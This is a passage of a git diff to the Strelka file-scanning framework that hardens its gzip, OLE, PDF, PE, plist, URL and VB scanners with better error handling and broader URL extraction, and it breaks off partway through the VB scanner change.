diff --git a/configs/python/backend/backend.yaml b/configs/python/backend/backend.yaml
index 21035abe..57ebdc2c 100644
--- a/configs/python/backend/backend.yaml
+++ b/configs/python/backend/backend.yaml
@@ -211,7 +211,6 @@ scanners:
- 'html_file'
priority: 5
options:
- parser: "html5lib"
max_hyperlinks: 50
# 'ScanIni':
# - positive:
@@ -613,6 +612,7 @@ scanners:
flavors:
- 'vb_file'
- 'vbscript'
+ - 'hta_file'
priority: 5
'ScanVba':
- positive:
diff --git a/src/python/strelka/scanners/scan_gzip.py b/src/python/strelka/scanners/scan_gzip.py
index f9d2ef10..318a9364 100644
--- a/src/python/strelka/scanners/scan_gzip.py
+++ b/src/python/strelka/scanners/scan_gzip.py
@@ -1,5 +1,6 @@
import gzip
import io
+import zlib
from strelka import strelka
@@ -8,10 +9,17 @@ class ScanGzip(strelka.Scanner):
"""Decompresses gzip files."""
def scan(self, data, file, options, expire_at):
- with io.BytesIO(data) as gzip_io:
- with gzip.GzipFile(fileobj=gzip_io) as gzip_obj:
- decompressed = gzip_obj.read()
- self.event["size"] = len(decompressed)
+ try:
+ with io.BytesIO(data) as gzip_io:
+ with gzip.GzipFile(fileobj=gzip_io) as gzip_obj:
+ decompressed = gzip_obj.read()
+ self.event["size"] = len(decompressed)
- # Send extracted file back to Strelka
- self.emit_file(decompressed, name=file.name)
+ # Send extracted file back to Strelka
+ self.emit_file(decompressed, name=file.name)
+        except (gzip.BadGzipFile, zlib.error):
+            self.flags.append("bad_gzip_file")
+ except EOFError:
+ self.flags.append("eof_error")
diff --git a/src/python/strelka/scanners/scan_ocr.py b/src/python/strelka/scanners/scan_ocr.py
index d44f4c5d..c359b668 100644
--- a/src/python/strelka/scanners/scan_ocr.py
+++ b/src/python/strelka/scanners/scan_ocr.py
@@ -39,8 +39,10 @@ def scan(self, data, file, options, expire_at):
# Convert PDF to PNG if required.
if pdf_to_png and "application/pdf" in file.flavors.get("mime", []):
try:
- doc = fitz.open(stream=data, filetype="pdf")
- data = doc.get_page_pixmap(0).tobytes("png")
+ reader = fitz.open(stream=data, filetype="pdf")
+ if reader.is_encrypted:
+ return
+ data = reader.get_page_pixmap(0).tobytes("png")
except Exception as e:
self.flags.append(
f"{self.__class__.__name__}: image_pdf_error: {str(e)[:50]}"
diff --git a/src/python/strelka/scanners/scan_ole.py b/src/python/strelka/scanners/scan_ole.py
index 1f92491f..9af0c044 100644
--- a/src/python/strelka/scanners/scan_ole.py
+++ b/src/python/strelka/scanners/scan_ole.py
@@ -10,6 +10,7 @@ class ScanOle(strelka.Scanner):
"""Extracts files from OLECF files."""
def scan(self, data, file, options, expire_at):
+ ole = None
self.event["total"] = {"streams": 0, "extracted": 0}
try:
@@ -47,5 +48,5 @@ def scan(self, data, file, options, expire_at):
except OSError:
self.flags.append("os_error")
finally:
- # TODO this should be wrapped with another try / catch as the variable assignment is not guaranteed
- ole.close()
+ if ole:
+ ole.close()
diff --git a/src/python/strelka/scanners/scan_pdf.py b/src/python/strelka/scanners/scan_pdf.py
index d94a1567..f949a6d4 100644
--- a/src/python/strelka/scanners/scan_pdf.py
+++ b/src/python/strelka/scanners/scan_pdf.py
@@ -65,44 +65,48 @@ def scan(self, data, file, options, expire_at):
# Set maximum XREF objects to be collected (default: 250)
max_objects = options.get("max_objects", 250)
- # Set Default Variables
- self.event["images"] = 0
- self.event["lines"] = 0
- self.event["links"] = []
- self.event["words"] = 0
- self.event.setdefault("xref_object", list())
- keys = list()
-
try:
with io.BytesIO(data) as pdf_io:
reader = fitz.open(stream=pdf_io, filetype="pdf")
# Collect Metadata
+ self.event["dirty"] = reader.is_dirty
+ self.event["encrypted"] = reader.is_encrypted
+ self.event["language"] = reader.language
+ self.event["needs_pass"] = reader.needs_pass
+ self.event["old_xrefs"] = reader.has_old_style_xrefs
+ self.event["pages"] = reader.page_count
+ self.event["repaired"] = reader.is_repaired
+ self.event["xrefs"] = reader.xref_length() - 1
+
+ if reader.is_encrypted:
+ return
+
+ # Set Default Variables
+ self.event["images"] = 0
+ self.event["lines"] = 0
+ self.event["links"] = []
+ self.event["words"] = 0
+ self.event.setdefault("xref_object", list())
+ keys = list()
+
self.event["author"] = reader.metadata["author"]
self.event["creator"] = reader.metadata["creator"]
self.event["creation_date"] = self._convert_timestamp(
reader.metadata["creationDate"]
)
- self.event["dirty"] = reader.is_dirty
self.event["embedded_files"] = {
"count": reader.embfile_count(),
"names": reader.embfile_names(),
}
- self.event["encrypted"] = reader.is_encrypted
- self.event["needs_pass"] = reader.needs_pass
self.event["format"] = reader.metadata["format"]
self.event["keywords"] = reader.metadata["keywords"]
- self.event["language"] = reader.language
self.event["modify_date"] = self._convert_timestamp(
reader.metadata["modDate"]
)
- self.event["old_xrefs"] = reader.has_old_style_xrefs
- self.event["pages"] = reader.page_count
self.event["producer"] = reader.metadata["producer"]
- self.event["repaired"] = reader.is_repaired
self.event["subject"] = reader.metadata["subject"]
self.event["title"] = reader.metadata["title"]
- self.event["xrefs"] = reader.xref_length() - 1
# Collect Phones Numbers
phones = []
@@ -129,7 +133,9 @@ def scan(self, data, file, options, expire_at):
if pattern in xref_object:
keys.append(obj.lower())
# Extract urls from xref
- self.event["links"].extend(re.findall('"(https?://.*?)"', xref_object))
+ self.event["links"].extend(
+ re.findall(r"https?://[^\s)>]+", xref_object)
+ )
self.event["objects"] = dict(Counter(keys))
# Convert unique xref_object set back to list
@@ -173,12 +179,20 @@ def scan(self, data, file, options, expire_at):
self.event["words"] += len(
list(filter(None, page.get_text().split(" ")))
)
- # extract links
+ # Extract links
for link in page.get_links():
self.event["links"].append(link.get("uri"))
text += page.get_text()
+ # Extract urls from text
+ self.event["links"].extend(re.findall(r"https?://[^\s)>]+", text))
+
+            # Deduplicate the links and drop empty values
+ if self.event["links"]:
+ self.event["links"] = list(set(filter(None, self.event["links"])))
+
# Send extracted file back to Strelka
self.emit_file(text.encode("utf-8"), name="text")
diff --git a/src/python/strelka/scanners/scan_pe.py b/src/python/strelka/scanners/scan_pe.py
index 4e3a9a26..6d1cb443 100644
--- a/src/python/strelka/scanners/scan_pe.py
+++ b/src/python/strelka/scanners/scan_pe.py
@@ -397,15 +397,18 @@ def scan(self, data, file, options, expire_at):
except pefile.PEFormatError:
self.flags.append("pe_format_error")
return
+ except AttributeError:
+ self.flags.append("pe_attribute_error")
+ return
if rich_dict := parse_rich(pe):
- if not isinstance(rich_dict, str):
+            if type(rich_dict) is not str:
self.event["rich"] = rich_dict
else:
self.flags.append(rich_dict)
if cert_dict := parse_certificates(data):
- if not isinstance(cert_dict, str):
+            if type(cert_dict) is not str:
self.event["security"] = cert_dict
else:
self.flags.append(cert_dict)
@@ -455,30 +458,33 @@ def scan(self, data, file, options, expire_at):
# https://github.com/erocarrera/pefile/blob/master/pefile.py#L3553
if hasattr(pe, "FileInfo"):
- fi = pe.FileInfo[0] # contains a single element
- for i in fi:
- if i.Key == b"StringFileInfo":
- for st in i.StringTable:
- for k, v in st.entries.items():
- if k.decode() in COMMON_FILE_INFO_NAMES:
- self.event["file_info"][
- COMMON_FILE_INFO_NAMES[k.decode()]
- ] = v.decode()
- else:
- self.event["file_info"]["string"].append(
- {
- "name": k.decode(),
- "value": v.decode(),
- }
- )
- elif i.Key == b"VarFileInfo":
- for v in i.Var:
- if translation := v.entry.get(b"Translation"):
- (lang, char) = translation.split()
- self.event["file_info"]["var"] = {
- "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)),
- "character_set": VAR_FILE_INFO_CHARS.get(int(char, 16)),
- }
+ if pe.FileInfo:
+ fi = pe.FileInfo[0] # contains a single element
+ for i in fi:
+ if i.Key == b"StringFileInfo":
+ for st in i.StringTable:
+ for k, v in st.entries.items():
+ if k.decode() in COMMON_FILE_INFO_NAMES:
+ self.event["file_info"][
+ COMMON_FILE_INFO_NAMES[k.decode()]
+ ] = v.decode()
+ else:
+ self.event["file_info"]["string"].append(
+ {
+ "name": k.decode(),
+ "value": v.decode(),
+ }
+ )
+ elif i.Key == b"VarFileInfo":
+ for v in i.Var:
+ if translation := v.entry.get(b"Translation"):
+ (lang, char) = translation.split()
+ self.event["file_info"]["var"] = {
+ "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)),
+ "character_set": VAR_FILE_INFO_CHARS.get(
+ int(char, 16)
+ ),
+ }
if hasattr(pe, "VS_FIXEDFILEINFO"):
vs_ffi = pe.VS_FIXEDFILEINFO[0] # contains a single element
@@ -509,7 +515,7 @@ def scan(self, data, file, options, expire_at):
self.event["header"] = {
"machine": {
"id": pe.FILE_HEADER.Machine,
- "type": pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine).replace(
+ "type": pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine, "").replace(
"IMAGE_FILE_MACHINE_", ""
),
},
@@ -518,7 +524,7 @@ def scan(self, data, file, options, expire_at):
"image": MAGIC_IMAGE.get(pe.OPTIONAL_HEADER.Magic, ""),
},
"subsystem": pefile.SUBSYSTEM_TYPE.get(
- pe.OPTIONAL_HEADER.Subsystem
+ pe.OPTIONAL_HEADER.Subsystem, ""
).replace("IMAGE_SUBSYSTEM_", ""),
}
@@ -600,43 +606,48 @@ def scan(self, data, file, options, expire_at):
resource_sha256_set = set()
for res0 in pe.DIRECTORY_ENTRY_RESOURCE.entries:
- for res1 in res0.directory.entries:
- for res2 in res1.directory.entries:
- lang = res2.data.lang
- sub = res2.data.sublang
- sub = pefile.get_sublang_name_for_lang(lang, sub)
- data = pe.get_data(
- res2.data.struct.OffsetToData, res2.data.struct.Size
- )
-
- resource_md5 = hashlib.md5(data).hexdigest()
- resource_sha1 = hashlib.sha1(data).hexdigest()
- resource_sha256 = hashlib.sha256(data).hexdigest()
-
- resource_md5_set.add(resource_md5)
- resource_sha1_set.add(resource_sha1)
- resource_sha256_set.add(resource_sha256)
-
- resource_dict = {
- "id": res1.id,
- "language": {"sub": sub.replace("SUBLANG_", "")},
- "type": pefile.RESOURCE_TYPE.get(res0.id, "").replace(
- "RT_", ""
- ),
- "md5": resource_md5,
- "sha1": resource_sha1,
- "sha256": resource_sha256,
- }
-
- if lang in pefile.LANG:
- resource_dict["language"]["primary"] = pefile.LANG[
- lang
- ].replace("LANG_", "")
-
- if res1.name:
- resource_dict["name"] = str(res1.name)
-
- self.event["resources"].append(resource_dict)
+ if hasattr(res0, "directory"):
+ for res1 in res0.directory.entries:
+ if hasattr(res1, "directory"):
+ for res2 in res1.directory.entries:
+ lang = res2.data.lang
+ sub = res2.data.sublang
+ sub = pefile.get_sublang_name_for_lang(lang, sub)
+ try:
+ data = pe.get_data(
+ res2.data.struct.OffsetToData,
+ res2.data.struct.Size,
+ )
+ except pefile.PEFormatError:
+ continue
+ resource_md5 = hashlib.md5(data).hexdigest()
+ resource_sha1 = hashlib.sha1(data).hexdigest()
+ resource_sha256 = hashlib.sha256(data).hexdigest()
+
+ resource_md5_set.add(resource_md5)
+ resource_sha1_set.add(resource_sha1)
+ resource_sha256_set.add(resource_sha256)
+
+ resource_dict = {
+ "id": res1.id,
+ "language": {"sub": sub.replace("SUBLANG_", "")},
+ "type": pefile.RESOURCE_TYPE.get(
+ res0.id, ""
+ ).replace("RT_", ""),
+ "md5": resource_md5,
+ "sha1": resource_sha1,
+ "sha256": resource_sha256,
+ }
+
+ if lang in pefile.LANG:
+ resource_dict["language"]["primary"] = pefile.LANG[
+ lang
+ ].replace("LANG_", "")
+
+ if res1.name:
+ resource_dict["name"] = str(res1.name)
+
+ self.event["resources"].append(resource_dict)
# TODO: Add optional resource extraction
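
A note on the header hunk above: pefile's MACHINE_TYPE and SUBSYSTEM_TYPE lookups return None for values they do not recognize, and None.replace() raises AttributeError, which is what the new empty-string defaults prevent. A tiny sketch with a deliberately bogus id:

    import pefile

    machine_id = 0xDEAD  # not a real IMAGE_FILE_MACHINE value
    # Without the "" default this would be None.replace(...) -> AttributeError.
    machine = pefile.MACHINE_TYPE.get(machine_id, "").replace("IMAGE_FILE_MACHINE_", "")
    print(machine or "unknown")
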
diff --git a/src/python/strelka/scanners/scan_plist.py b/src/python/strelka/scanners/scan_plist.py
index 61c82701..08e19a0d 100644
--- a/src/python/strelka/scanners/scan_plist.py
+++ b/src/python/strelka/scanners/scan_plist.py
@@ -20,20 +20,21 @@ def scan(self, data, file, options, expire_at):
plist = plistlib.loads(data)
self.event["keys"] = []
- for k, v in plist.items():
- if keys and k not in keys:
- continue
-
- try:
- v = ast.literal_eval(v)
- except (ValueError, SyntaxError):
- pass
-
- self.event["keys"].append(
- {
- "key": k,
- "value": v,
- }
- )
+ if isinstance(plist, dict):
+ for k, v in plist.items():
+ if keys and k not in keys:
+ continue
+
+ try:
+ v = ast.literal_eval(v)
+ except (ValueError, SyntaxError):
+ pass
+
+ self.event["keys"].append(
+ {
+ "key": k,
+ "value": v,
+ }
+ )
except xml.parsers.expat.ExpatError:
self.flags.append("invalid_format")
diff --git a/src/python/strelka/scanners/scan_url.py b/src/python/strelka/scanners/scan_url.py
index 1e05784a..599d1940 100644
--- a/src/python/strelka/scanners/scan_url.py
+++ b/src/python/strelka/scanners/scan_url.py
@@ -24,6 +24,8 @@ class ScanUrl(strelka.Scanner):
"""
def init(self):
+ # Default compiled regex pattern for URL extraction.
+        # It aims to match URLs by scheme, by hostname ending in a known TLD, or by bare IPv4 address.
self.regexes = {
"default": re.compile(
rb'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|h
ere|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|s
tarhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))'
@@ -31,19 +33,28 @@ def init(self):
}
def scan(self, data, file, options, expire_at):
- regex = options.get("regex", False)
- if regex:
- ((key, value),) = regex.items()
- if key not in self.regexes:
- self.regexes[key] = re.compile(value.encode())
- url_regex = self.regexes[key]
- else:
- url_regex = self.regexes["default"]
-
- normalized_data = b" ".join(data.split())
- self.event.setdefault("urls", [])
- urls = url_regex.findall(normalized_data)
- for url in urls:
- url = url.strip(b"!\"#$%&'()*+,-./@:;<=>[\\]^_`{|}~")
- if url not in self.event["urls"]:
- self.event["urls"].append(url)
+ try:
+ # Obtain regex pattern from options or use the default one.
+ regex_key = options.get("regex", "default")
+ if regex_key not in self.regexes and regex_key in options:
+ # Compile and store the custom regex if provided and not already compiled.
+ self.regexes[regex_key] = re.compile(options[regex_key].encode())
+
+ url_regex = self.regexes[regex_key]
+
+ # Normalize data: replace multiple whitespace characters with a single space.
+ normalized_data = re.sub(rb"\s+", b" ", data)
+
+ # Initialize 'urls' event list to store extracted URLs.
+ self.event.setdefault("urls", [])
+
+ # Find all URLs using the regex pattern.
+ urls = set(url_regex.findall(normalized_data))
+ for url in urls:
+ # Strip leading and trailing punctuation characters from the URL.
+ clean_url = url.strip(b"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~").decode()
+ if clean_url not in self.event["urls"]:
+ self.event["urls"].append(clean_url)
+
+ except Exception as e:
+ self.flags.append(f"scanner_error: {e}")
diff --git a/src/python/strelka/scanners/scan_vb.py b/src/python/strelka/scanners/scan_vb.py
index dfcd654b..8fd51674 100644
--- a/src/python/strelka/scanners/scan_vb.py
+++ b/src/python/strelka/scanners/scan_vb.py
@@ -1,3 +1,5 @@
+import re
+
import pygments
from pygments import formatters, lexers
@@ -5,58 +7,143 @@
class ScanVb(strelka.Scanner):
- """Collects metadata from Visual Basic script files.
+ """
+ Scanner for Visual Basic (VB) script files.
+
+ This scanner parses VB script files to extract various components like comments,
+ function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to
+ tokenize the script data and then extracts useful information from these tokens.
Attributes:
- lexer: Pygments lexer ('vbnet') used to parse the file.
+ lexer: A Pygments lexer object for tokenizing VB.NET scripts.
+ url_regex: A compiled regex pattern for extracting URLs from the script.
"""
def init(self):
+ # Initialize the lexer for VB.NET language using Pygments
self.lexer = lexers.get_lexer_by_name("vbnet")
- def scan(self, data, file, options, expire_at):
- highlight = pygments.highlight(
- data,
- self.lexer,
- formatters.RawTokenFormatter(),
+ # Regular expression to capture URLs, considering various schemes and TLDs.
+ self.url_regex = re.compile(
